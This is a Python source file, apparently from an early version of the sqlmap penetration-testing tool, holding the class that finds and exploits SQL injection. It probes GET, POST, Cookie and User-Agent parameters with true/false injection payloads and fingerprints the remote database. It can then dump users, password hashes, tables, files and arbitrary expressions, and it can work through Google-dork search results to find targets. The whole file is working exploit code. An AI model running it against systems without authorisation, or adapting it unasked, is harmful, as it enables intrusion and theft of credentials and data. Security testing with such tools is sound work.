#!/usr/bin/env python


import logging
import random
import time

from sqlmap.dump import Dump
from sqlmap.settings import MSSQL_ALIASES
from sqlmap.settings import MYSQL_ALIASES
from sqlmap.settings import PGSQL_ALIASES
from sqlmap.settings import ORACLE_ALIASES
from sqlmap.settings import SUPPORTED_DBMS
from sqlmap.union import UnionCheck

from sqlmap.plugins.mysql import MySQLMap
from sqlmap.plugins.postgresql import PostgreSQLMap
from sqlmap.plugins.mssqlserver import MSSQLServerMap
from sqlmap.plugins.oracle import OracleMap


class Injection(UnionCheck):
    """
    This class defines methods to check url stability, parameters
    dynamicity and perform SQL injection on affected parameters

    @author: Bernardo Damele
    """

    def __init__(self, checkedArgs):
        self.logger = logging.getLogger("sqlmapLog")
        self.args = checkedArgs


    def __getDbHandler(self):
        """
        This method fingerprint the remote database management
        system
        """

        app = None

        if self.args.dbms in MYSQL_ALIASES:
            app = MySQLMap(self.args)
            if app.checkDbms():
                return app
        elif self.args.dbms in ORACLE_ALIASES:
            app = OracleMap(self.args)
            if app.checkDbms():
                return app
        elif self.args.dbms in PGSQL_ALIASES:
            app = PostgreSQLMap(self.args)
            if app.checkDbms():
                return app
        elif self.args.dbms in MSSQL_ALIASES:
            app = MSSQLServerMap(self.args)
            if app.checkDbms():
                return app
        else:
            app = MySQLMap(self.args)
            if app.checkDbms():
                return app

            app = OracleMap(self.args)
            if app.checkDbms():
                return app

            app = PostgreSQLMap(self.args)
            if app.checkDbms():
                return app

            app = MSSQLServerMap(self.args)
            if app.checkDbms():
                return app

        return None


    def __exploit(self):
        """
        This method exploit the SQL injection on the affected
        url parameter and extract requested data from the
        remote database management system or operating system
        if possible
        """

        dumper = Dump(self.args)
        app = self.__getDbHandler()

        if not app:
            htmlParsed = self.getHtmlErrorFp()

            errMsg  = "sqlmap was not able to fingerprint the "
            errMsg += "remote database management system"

            if htmlParsed:
                errMsg += ", but from the HTML error page it was "
                errMsg += "possible to determinate that the "
                errMsg += "remote DBMS is %s. " % htmlParsed

            if htmlParsed.lower() in SUPPORTED_DBMS:
                errMsg += "Do not specify the remote DBMS manually, "
                errMsg += "sqlmap will fingerprint the DBMS for you"
            else:
                errMsg += "Support for this DBMS will be implemented if "
                errMsg += "you ask, just drop me an email "
                errMsg += "<bernardo.damele@gmail.com>"

            raise Exception, errMsg

        print "remote DBMS:\t%s\n" % app.getFingerprint()

        if self.args.unionCheck:
            dumper.string("valid union", self.unionCheck())

        if self.args.getBanner:
            dumper.string("banner", app.getBanner())

        if self.args.getCurrentUser:
            dumper.string("current user", app.getCurrentUser())

        if self.args.getCurrentDb:
            dumper.string("current database", app.getCurrentDb())

        if self.args.getUsers:
            dumper.lister("database management system users", app.getUsers())

        if self.args.getPasswordHashes:
            dumper.passwordHashes("database management system users password hashes",
                                  app.getPasswordHashes())

        if self.args.getDbs:
            dumper.lister("available databases", app.getDbs())

        if self.args.getTables:
            dumper.dbTables(app.getTables())

        if self.args.getColumns:
            dumper.dbTableColumns(app.getColumns())

        if self.args.dumpTable:
            dumper.dbTableValues(app.dumpTable())

        if self.args.dumpAll:
            app.dumpAll()

        if self.args.filename:
            dumper.string(self.args.filename,
                          app.getFile(self.args.filename))

        if self.args.expression:
            dumper.string(self.args.expression,
                          app.getExpr(self.args.expression))


    def __checkSqlInjection(self, place, parameter, value):
        """
        This method checks if the GET, POST, Cookie, User-Agent
        parameters are affected by a SQL injection vulnerability and
        identifies the type of SQL injection:

          * Numeric/Unescaped injection
          * String/Single quote injection
          * String/Double quotes injection
        """

        logMsg  = "testing numeric/unescaped injection "
        logMsg += "on %s parameter '%s'" % (place, parameter)
        self.logger.info(logMsg)

        randInt = random.randint(1, 9)
        payload = self.payload(place, parameter, value, "%s AND %d=%d" % (value, randInt, randInt))
        trueResult = self.queryPage(payload, place)

        if trueResult == self.args.defaultResult:
            payload = self.payload(place, parameter, value, "%s AND %d=%d" % (value, randInt, randInt + 1))
            falseResult = self.queryPage(payload, place)

            if falseResult != self.args.defaultResult:
                logMsg  = "confirming numeric/unescaped injection "
                logMsg += "on %s parameter '%s'" % (place, parameter)
                self.logger.info(logMsg)

                payload = self.payload(place, parameter, value, "%s AND NoValue" % value)
                falseResult = self.queryPage(payload, place)

                if falseResult != self.args.defaultResult:
                    logMsg  = "%s parameter '%s' is " % (place, parameter)
                    logMsg += "numeric/unescaped injectable" 
                    self.logger.info(logMsg)

                    self.args.injectionMethod = "numeric"

                    return True

        logMsg  = "%s parameter '%s' is not " % (place, parameter)
        logMsg += "numeric/unescaped injectable"
        self.logger.info(logMsg)

        logMsg  = "testing string/single quote injection "
        logMsg += "on %s parameter '%s'" % (place, parameter)
        self.logger.info(logMsg)

        payload = self.payload(place, parameter, value, "%s' AND '1'='1" % value)
        trueResult = self.queryPage(payload, place)

        if trueResult == self.args.defaultResult:
            payload = self.payload(place, parameter, value, "%s' AND '1'='2" % value)
            falseResult = self.queryPage(payload, place)

            if falseResult != self.args.defaultResult:
                logMsg  = "confirming string/single quote injection "
                logMsg += "on %s parameter '%s'" % (place, parameter)
                self.logger.info(logMsg)

                payload = self.payload(place, parameter, value, "%s' and NoValue" % value)
                falseResult = self.queryPage(payload, place)

                if falseResult != self.args.defaultResult:
                    logMsg  = "%s parameter '%s' is " % (place, parameter)
                    logMsg += "string/single quote injectable" 
                    self.logger.info(logMsg)

                    self.args.injectionMethod = "stringsingle"

                    return True

        logMsg  = "%s parameter '%s' is not " % (place, parameter)
        logMsg += "string/single quote injectable"
        self.logger.info(logMsg)

        logMsg  = "testing string/double quotes injection "
        logMsg += "on %s parameter '%s'" % (place, parameter)
        self.logger.info(logMsg)

        payload = self.payload(place, parameter, value, '%s" AND "1"="1' % value)
        trueResult = self.queryPage(payload, place)

        if trueResult == self.args.defaultResult:
            payload = self.payload(place, parameter, value, '%s" AND "1"="2' % value)
            falseResult = self.queryPage(payload, place)

            if falseResult != self.args.defaultResult:
                logMsg  = "confirming string/double quotes injection "
                logMsg += "on %s parameter '%s'" % (place, parameter)
                self.logger.info(logMsg)

                payload = self.payload(place, parameter, value, '%s" AND "NoValue' % value)
                falseResult = self.queryPage(payload, place)

                if falseResult != self.args.defaultResult:
                    logMsg  = "%s parameter '%s' is " % (place, parameter)
                    logMsg += "string/double quotes injectable" 
                    self.logger.info(logMsg)

                    self.args.injectionMethod = "stringdouble"

                    return True

        logMsg  = "%s parameter '%s' is not " % (place, parameter)
        logMsg += "string/double quotes injectable"
        self.logger.info(logMsg)

        return False


    def __checkSqlInjectionPreface(self, place, parameter, value):
        """
        This method checks if the GET, POST, Cookie, User-Agent
        parameters are affected by a SQL injection vulnerability
        """

        logMsg  = "testing sql injection on "
        logMsg += "%s parameter '%s'" % (place, parameter)
        self.logger.info(logMsg)

        if not self.__checkSqlInjection(place, parameter, value):
            warnMsg = "%s parameter '%s' is not injectable" % (place, parameter)
            self.logger.warn(warnMsg)
        else:
            return place, parameter


    def __checkDynParam(self, place, parameter, value):
        """
        This method checks if the url parameter is dynamic. If it is
        dynamic, the content of the page differs, otherwise the
        dynamicity might depend on another parameter.
        """

        logMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
        self.logger.info(logMsg)

        payload = self.payload(place, parameter, value, "47")
        dynResult1 = self.queryPage(payload, place)

        if self.args.defaultResult == dynResult1:
            return False

        logMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
        self.logger.info(logMsg)

        payload = self.payload(place, parameter, value, "'NoValue")
        dynResult2 = self.queryPage(payload, place)

        payload = self.payload(place, parameter, value, '"NoValue')
        dynResult3 = self.queryPage(payload, place)

        condition  = self.args.defaultResult != dynResult2
        condition |= self.args.defaultResult != dynResult3

        return condition


    def __checkUrlStable(self):
        """
        This method checks if the URL content is stable requesting the
        same page three times with a small delay within each request to
        assume that it is stable.

        In case the content of the page differs when requesting
        the same page, the dynamicity might depend on other parameters,
        like for instance string matching (--string).
        """

        firstResult = self.queryPage()
        time.sleep(0.5)

        secondResult = self.queryPage()
        time.sleep(0.5)

        thirdResult = self.queryPage()

        condition  = firstResult == secondResult
        condition &= secondResult == thirdResult

        return condition


    def __effectiveRun(self):
        """
        This method performs checks on both URL stability and all
        GET, POST, Cookie and User-Agent parameters to check if they are
        dynamic and SQL injection affected
        """

        try:
            self.args.defaultResult = self.queryPage()
        except:
            warnMsg = "unable to connect to the target url"

            if self.args.googleDork:
                warnMsg += ", skipping to next url"
                self.logger.warn(warnMsg)
            else:
                warnMsg += " or proxy"
                raise Exception, warnMsg

        if not self.args.string:
            logMsg = "testing if the url is stable, wait a few seconds"
            self.logger.info(logMsg)

            if not self.__checkUrlStable():
                errMsg  = "url is not stable, unable "
                errMsg += "to test for SQL injection"

                if self.args.googleDork:
                    errMsg += ", skipping to next url"
                    self.logger.warn(errMsg)

                    return
                else:
                    raise Exception, errMsg
            else:
                logMsg = "url is stable"
                self.logger.info(logMsg)

        for place, parameters in self.args.parameters.items():
            paramDict = self.args.paramDict[place]

            for parameter, value in paramDict.items():
                if not self.__checkDynParam(place, parameter, value):
                    warnMsg = "%s parameter '%s' is not dynamic" % (place, parameter)
                    self.logger.warn(warnMsg)
                else:
                    logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
                    self.logger.info(logMsg)

                    injPlace, injParameter = self.__checkSqlInjectionPreface(place, parameter, value)

                    if injPlace:
                        return (injPlace, injParameter)

        return None


    def run(self):
        """
        This method calls a method that performs checks on both URL
        stability and all GET, POST, Cookie and User-Agent parameters to
        check if they are dynamic and SQL injection affected
        """

        if self.args.url:
            injData = self.__effectiveRun()

            if injData:
                self.args.injPlace, self.args.injParameter = injData

            if self.args.injPlace == "User-Agent":
                self.args.injParameter = self.args.uAgent

            if not self.args.injPlace or not self.args.injParameter:
                raise Exception, "all parameters are not injectable"

            self.__exploit()
        else:
            hostCount = 0

            for testableHost in self.args.testableHosts:
                hostCount += 1

                message  = "url %d: %s, " % (hostCount, testableHost)
                message += "do you want to test this url? [y/N/q] "
                test = raw_input("[%s] [INPUT] %s" % (time.strftime("%X"), message))

                if not test or test[0] in ("n", "N"):
                    continue
                elif test[0] in ("q", "Q"):
                    break

                logMsg = "testing url %s" % testableHost
                self.logger.info(logMsg)

                # NOTE: for Google dork results the tests and injection
                # can only be performed on GET parameters
                self.args.url = testableHost
                self.forgeTestParameters()
                self.args.url, parameters = self.splitUrlParams()
                self.args.parameters["GET"] = parameters
                self.args.paramDict["GET"] = self.paramDict("GET", parameters)

                injData = self.__effectiveRun()

                if injData:
                    self.args.injPlace, self.args.injParameter = injData

                if self.args.injPlace and self.args.injParameter:
                    message = "do you want to exploit this SQL injection? [Y/n] "
                    exploit = raw_input("[%s] [INPUT] %s" % (time.strftime("%X"), message))

                    if not exploit or exploit[0] in ("y", "Y"):
                        self.__exploit()
